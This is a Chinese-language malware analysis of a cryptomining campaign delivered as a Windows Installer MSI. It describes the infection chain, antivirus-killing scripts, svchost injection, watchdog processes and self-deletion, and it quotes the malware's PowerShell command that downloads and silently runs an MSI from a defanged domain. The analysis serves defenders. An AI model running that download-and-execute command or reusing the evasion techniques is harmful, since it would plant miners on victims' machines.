加密貨幣挖礦惡意軟件開始使用一些包括Windows installer在內的新的繞過技術。
加密貨幣挖礦惡意軟件數量不斷增長的一個原因是其暴利性，另一個原因是可以在系統中不被檢測到，尤其是使用了不同的混淆技術后更難檢測。研究人員發現，攻擊者在不斷的向加密貨幣挖礦惡意軟件中添加混淆技術來繞過AV的檢測。
安裝器行為

圖1. 惡意軟件感染鏈
惡意軟件以Windows installer MSI文件的形式到達受害者機器，Windows installer MSI文件是一個用于安裝軟件的合法應用程序。使用真實的Windows組件可以使其看著不那么可疑，而且可以繞過一些安全過濾器。
研究人員分析樣本的安裝過程發現，惡意MSI文件會將自己安裝到%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server目錄下，如果用戶設備上不存在該目錄，就會創建該目錄。該目錄含有許多不同的文件，作為攻擊鏈的一部分：
· bat – 用于終止正在運行的反病毒軟件的腳步文件
· exe – 用于解壓釋放在另一個目錄中的icon.ico文件的解壓工具
· ico – 密碼保護的zip文件，顯示為icon文件
解壓icon.ico后出現兩個文件：
· ocx – 加載器模塊，負責解密和安裝加密貨幣挖礦模塊
· bin – 加密的，UPX打包的，Delphi 編譯的加密貨幣挖礦模塊
安裝過程的另一部分包含在%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server\{Random Numbers}中創建kernel文件ntdll.dll和Windows USER組件user32.dll。研究人員這是為了預防惡意軟件API的檢測。如下所示的配置文件也會釋放到 %UserTemp%\[Random Number]文件夾中。

圖2. 挖礦機的配置文件
安裝過程使用的語言是Cyrillic而非英語，這或許暗示著惡意軟件來源的區域。

圖3. 安裝過程顯示窗口
進程注入和監視器創建
安裝后，在執行以下命令前，ex.exe文件會解壓icon.ico文件：
 rundll32 default.ocx,Entry u
為注入代碼創建3個新Service Host (svchost.exe)進程。前兩個SvcHost進程起著監視器的作用。當注入的svchost進程中止后，這兩個進程負責通過powerShell命令重新下載Windows Installer (.msi)文件。
“powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[‘User-Agent’] = ‘Windows Installer’;$f = ‘C:\%UserTemp%\{random number}.msi’; $cli.DownloadFile(‘hxxps://superdomain1709[.]info/update[.]txt’, $f);Start-Process $f -ArgumentList ‘/q’”
然后將第三個SvcHost進程注入到挖礦機模塊并使用下面的命令執行：
“%system32%\svchost.exe –config={malware configuration path}

圖4. 第三個Service Host進程
為了使用檢測和分析變得更難，惡意軟件還有自毀機制。首先，創建和執行下面的文件：
 {Random Characters}.cmD 
然后刪除安裝目錄中的所有文件，并移除系統內所有的安裝痕跡。
惡意軟件非常特別的一點是使用主流的Windows Installer builder WiX作為打包器，有點像一層反檢測層。這也說明攻擊者在不斷努力來保證其創建活動處于隱蔽狀態。